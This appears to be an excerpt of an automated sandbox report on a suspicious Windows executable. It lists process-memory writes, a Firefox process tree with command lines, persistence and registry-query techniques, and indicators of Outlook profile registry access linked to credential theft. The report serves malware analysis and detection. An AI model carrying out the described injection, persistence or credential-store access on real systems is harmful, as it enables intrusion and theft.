PID 4392 wrote to memory of 3136	4392	firefox.exe	89
PID 3136 wrote to memory of 812	3136	firefox.exe	91
PID 3136 wrote to memory of 812	3136	firefox.exe	91
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4148	3136	firefox.exe	92
PID 3136 wrote to memory of 4908	3136	firefox.exe	95
PID 3136 wrote to memory of 4908	3136	firefox.exe	95
PID 3136 wrote to memory of 4908	3136	firefox.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	dllhost.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	dllhost.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:752
- C:\Users\Admin\AppData\Local\Temp\5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
  "C:\Users\Admin\AppData\Local\Temp\5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:648
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3136
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.0.998141130\784102742" -parentBuildID 20221007134813 -prefsHandle 1836 -prefMapHandle 1828 -prefsLen 20812 -prefMapSize 232645 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae3e9ac0-0b91-41ab-b5a7-c957a664f223} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 1916 2113e3e9858 gpu
      4⤵
      PID:812
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.1.313025124\272427039" -parentBuildID 20221007134813 -prefsHandle 2304 -prefMapHandle 2300 -prefsLen 20848 -prefMapSize 232645 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ed89849-7f52-462b-aa9b-4e617b743639} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2316 2113146f558 socket
      4⤵
      PID:4148
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.2.615486453\130647531" -childID 1 -isForBrowser -prefsHandle 3068 -prefMapHandle 3064 -prefsLen 20931 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e595251-cff2-4a08-b3d5-c1d3480eaf8b} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2984 2113e368258 tab
      4⤵
      PID:4908
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.3.1646964435\717132100" -childID 2 -isForBrowser -prefsHandle 3520 -prefMapHandle 3496 -prefsLen 26441 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {523defc9-b92f-478c-9462-31a44f2cd62b} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2472 21131471c58 tab
      4⤵
      PID:4100
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.4.658691459\1103718973" -childID 3 -isForBrowser -prefsHandle 3988 -prefMapHandle 3984 -prefsLen 26441 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67507c02-fe2f-4ddc-9a99-57561d87655b} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3992 211432f0258 tab
      4⤵
      PID:5036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.6.1310986846\512591693" -childID 5 -isForBrowser -prefsHandle 4988 -prefMapHandle 4652 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a2a3f54-a1d3-4901-b3db-5b586259d510} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5000 211445c2f58 tab
      4⤵
      PID:2520
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.7.2021550948\2047831673" -childID 6 -isForBrowser -prefsHandle 5220 -prefMapHandle 5224 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c9044dd-b6db-4a7d-924c-09047b6e5ac6} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2760 2114492b558 tab
      4⤵
      PID:4312
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.5.563283045\218613192" -childID 4 -isForBrowser -prefsHandle 4984 -prefMapHandle 2752 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b68a8983-0288-42ca-befe-1e26c13b29e0} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5004 2113e3c0358 tab
      4⤵
      PID:4956
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.8.2045514556\694479370" -childID 7 -isForBrowser -prefsHandle 5464 -prefMapHandle 3308 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44de7474-938d-4cf3-a43d-f45821e8049e} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5684 211456a5558 tab
      4⤵
      PID:3328
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.9.2036185813\1132368658" -childID 8 -isForBrowser -prefsHandle 2468 -prefMapHandle 5512 -prefsLen 26692 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c8c9e5a-f720-49c9-970c-7ddc04456f36} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3600 211456a6a58 tab
      4⤵
      PID:4768
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.10.1151051174\1771534362" -parentBuildID 20221007134813 -prefsHandle 5952 -prefMapHandle 5924 -prefsLen 26957 -prefMapSize 232645 -appDir "C:\Program Files\Mozilla Firefox\browser" - {52285205-14f2-458e-bf1c-274ddc925b1f} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5988 21146410d58 rdd
      4⤵
      PID:5528
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.11.175637693\1278195423" -childID 9 -isForBrowser -prefsHandle 6140 -prefMapHandle 6136 -prefsLen 26957 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75dfb30a-0626-49c8-ad10-dfb698cfa697} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3468 2113fa2c558 tab
      4⤵
      PID:5968
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.12.570643028\287248006" -childID 10 -isForBrowser -prefsHandle 6316 -prefMapHandle 6308 -prefsLen 26957 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5af888cd-7a87-4329-9917-057efc8ed64d} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4836 2114456c858 tab
      4⤵
      PID:5436
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.13.252643490\449439820" -childID 11 -isForBrowser -prefsHandle 6528 -prefMapHandle 3740 -prefsLen 26957 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa384336-4db2-49fb-a0d9-c971eb98b654} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6524 21144929158 tab
      4⤵
      PID:5340
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.14.314406719\459616013" -childID 12 -isForBrowser -prefsHandle 3568 -prefMapHandle 4948 -prefsLen 27172 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1906efab-0865-4c5f-b738-7c13fef0dc9d} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4380 21140915258 tab
      4⤵
      PID:1272
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.15.840921988\1663620141" -childID 13 -isForBrowser -prefsHandle 1424 -prefMapHandle 1328 -prefsLen 27172 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76e0604d-7004-4734-b8d7-2a5a7e36df96} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 8344 2114313fd58 tab
      4⤵
      PID:5052
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.16.544723046\1270298220" -childID 14 -isForBrowser -prefsHandle 8104 -prefMapHandle 8292 -prefsLen 27172 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b61010b3-a9dc-406c-ba10-bc114c54a967} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 8080 21146410158 tab
      4⤵
      PID:1112
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.17.1723004196\1357476452" -childID 15 -isForBrowser -prefsHandle 9424 -prefMapHandle 9428 -prefsLen 27172 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bdac9d7-f1d5-42fd-a266-152827c45830} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9416 2114313f458 tab
      4⤵
      PID:1252
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.18.583563147\261519799" -childID 16 -isForBrowser -prefsHandle 9868 -prefMapHandle 9816 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1941080f-6035-459b-b0b4-0e3cec2212e8} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9864 2113e3bf158 tab
      4⤵
      PID:1552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.19.1694918018\60467095" -childID 17 -isForBrowser -prefsHandle 7956 -prefMapHandle 9436 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72d4c031-d03c-4845-b2bd-f6645b03ef94} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7820 21131463858 tab
      4⤵
      PID:2572
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.22.1098659882\976042440" -childID 20 -isForBrowser -prefsHandle 7732 -prefMapHandle 7736 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07beae47-5ff9-4354-b56a-1e27eabf3e88} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7720 2114492b558 tab
      4⤵
      PID:2352
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.21.716362389\2118847434" -childID 19 -isForBrowser -prefsHandle 9408 -prefMapHandle 4992 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5c57fec-3f50-43f8-a2f7-2f146fadb30b} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9200 2114492a358 tab
      4⤵
      PID:4544
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.20.993535350\704834988" -childID 18 -isForBrowser -prefsHandle 9480 -prefMapHandle 9476 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0195ab90-7d2b-4e3d-8bd3-b065b5da5d77} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 8068 2114492a958 tab
      4⤵
      PID:5204
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.23.292759283\1723608729" -childID 21 -isForBrowser -prefsHandle 9164 -prefMapHandle 9148 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890d2126-f66a-42a1-8def-ffe2b235478a} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4328 21146976558 tab
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1044
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.24.1644658336\365637952" -childID 22 -isForBrowser -prefsHandle 7356 -prefMapHandle 8084 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1cb5274-d964-4743-8f72-c47cd244eeb3} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7364 21144995c58 tab
      4⤵
      PID:2324
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.26.1057481411\99720994" -childID 24 -isForBrowser -prefsHandle 6428 -prefMapHandle 7172 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68ed7b85-d4cf-425b-a41c-47a1bf42c515} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7872 21144996b58 tab
      4⤵
      PID:1132
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.25.1852482764\1733429957" -childID 23 -isForBrowser -prefsHandle 3740 -prefMapHandle 6504 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14a932f9-4cbd-4227-8ffc-72e27c1e4f71} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6436 21144996258 tab
      4⤵
      PID:1176
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.27.1099001057\1767788331" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 7748 -prefMapHandle 7540 -prefsLen 27181 -prefMapSize 232645 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7388b983-5082-4140-a68f-71bc12c89901} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5640 2114640f258 utility
      4⤵
      PID:2016
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.28.586596390\1238890764" -childID 25 -isForBrowser -prefsHandle 9204 -prefMapHandle 7760 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b823807-9425-4af5-bf35-7844823070ee} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7372 2113fce1258 tab
      4⤵
      PID:5132
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.29.1822467396\1669513572" -childID 26 -isForBrowser -prefsHandle 9948 -prefMapHandle 9952 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02402571-5828-41dd-a326-e36bd6b750d7} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 8396 2113fa2b058 tab
      4⤵
      PID:2260
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.32.1318493953\52302160" -childID 29 -isForBrowser -prefsHandle 5512 -prefMapHandle 4988 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a0661e6-8d1d-445d-8bb6-6769abef1515} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2944 21143ad3858 tab
      4⤵
      PID:1996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.31.124584877\886069559" -childID 28 -isForBrowser -prefsHandle 9564 -prefMapHandle 9500 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e69c61a1-bd1b-4ce7-a596-4d77f591f313} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3660 21143ad2358 tab
      4⤵
      PID:5844
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.30.1317929415\1025338737" -childID 27 -isForBrowser -prefsHandle 7660 -prefMapHandle 8032 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df03d599-f0d7-41be-9c55-c00b9598aef0} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5556 21143ad1d58 tab
      4⤵
      PID:2324
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.34.659209434\686423366" -childID 31 -isForBrowser -prefsHandle 5428 -prefMapHandle 8000 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57504a35-cb62-45ee-bc12-068415491617} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7988 2113dce8b58 tab
      4⤵
      PID:1736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.33.728251957\1681787669" -childID 30 -isForBrowser -prefsHandle 7996 -prefMapHandle 9320 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13d99d3f-fe0f-4e06-be6d-b1bbdc822ff6} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9560 2113dce5b58 tab
      4⤵
      PID:432
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.35.2133852078\1716600936" -childID 32 -isForBrowser -prefsHandle 7728 -prefMapHandle 6360 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa2cdefc-158f-4b6a-b04e-fd77fbfadd47} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6008 2113dce8558 tab
      4⤵
      PID:2652
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.36.2006150855\1266357557" -childID 33 -isForBrowser -prefsHandle 4672 -prefMapHandle 4924 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec8e88d-5463-45d7-9a9f-2a00c57ea207} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3612 21146928458 tab
      4⤵
      PID:2536
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.38.1358574471\1349150044" -childID 35 -isForBrowser -prefsHandle 5556 -prefMapHandle 9904 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e11d86d-fd09-4565-8ed9-21de568ab13e} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 9964 21142fb0158 tab
      4⤵
      PID:5168
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.37.629515656\1418810263" -childID 34 -isForBrowser -prefsHandle 7616 -prefMapHandle 7620 -prefsLen 27181 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d239f92c-e6ed-44f1-b014-6406c65d06a8} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6136 2113dce8b58 tab
      4⤵
      PID:3256
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.39.77340846\1801908893" -childID 36 -isForBrowser -prefsHandle 7252 -prefMapHandle 3976 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e13de449-217a-4410-bbdd-5062b0b20d82} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2768 2113dce6158 tab
      4⤵
      PID:428
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.41.9670948\483021483" -childID 38 -isForBrowser -prefsHandle 6548 -prefMapHandle 7460 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22dfc4c3-d194-4b66-929d-6ef97fee5daa} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7304 2113fa2ad58 tab
      4⤵
      PID:2260
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.42.1933533058\379041252" -childID 39 -isForBrowser -prefsHandle 6424 -prefMapHandle 8092 -prefsLen 27190 -prefMapSize 232645 -jsInitHandle 1476 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f40f3073-2891-4412-b8ef-c1711c0099d5} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 7620 21140d5e858 tab
      4⤵
